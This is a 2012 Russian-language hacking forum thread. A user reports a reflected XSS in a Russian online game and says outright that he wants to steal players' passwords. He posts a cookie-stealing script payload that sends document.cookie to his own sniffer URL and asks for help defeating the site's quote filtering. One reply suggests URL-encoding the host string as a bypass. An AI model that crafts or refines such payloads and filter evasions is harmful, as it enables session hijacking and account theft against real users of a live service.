Пасивная XSS, нужна помощь!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Пасивная XSS, нужна помощь! - 2012-01-28 21:24:21.320000
|
|
|
Rifes
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-28 21:14:54.053333
|
Всем доброго времени суток, у меня возникла тут одна проблема… Нашел XSS в одной русской ММОРПГ, хотелось бы утащить пароли… но вот проблема запрос - <script>alert(/Rifes XSS/)</script> - проходит успешно… в то время как: <sсriрt>img = new Image(); img.src = "http://мой-сайт.уг/snif/s.gif?c="+document.cookie;</sсriрt> Фильтрует на: <sсriрt>img = new Image(); img.src =\"http://мой-сайт.уг/snif/s.gif?c=\" document.cookie;</sсriрt> поможет ли кто составить правильный запрос? если кому интересно искал сканером на уязвимости JSky, по лучше WebCruiser будет!
|
|
|
RE: Пасивная XSS, нужна помощь! - 2012-01-30 07:02:43.280000
|
|
|
den_hacker
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-30 06:15:18.350000
|
Может фильтр на "" или http:// Попробуй вместо "http://мой-сайт.уг/snif/s.gif?c=" Вставить %22http%3A%2F%2F%EC%EE%E9%2D%F1%E0%E9%F2%2E%F3%E3%2Fsnif%2Fs%2Egif%3Fc%3D%22 и + заменить на %2B Может и сожрёт фильтр
|
|
|
RE: Пасивная XSS, нужна помощь! - 2012-01-30 19:00:22.880000
|
|
|
Rifes
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-28 21:14:54.053333
|
Увы не помогло, все-таки фильтрует
|
|
|
RE: Пасивная XSS, нужна помощь! - 2012-02-09 18:48:01.300000
|
|
|
Rifes
Сообщений: 9
Оценки: 0
Присоединился: 2012-01-28 21:14:54.053333
|
Ну что есть идеи?
|
|
|
|
|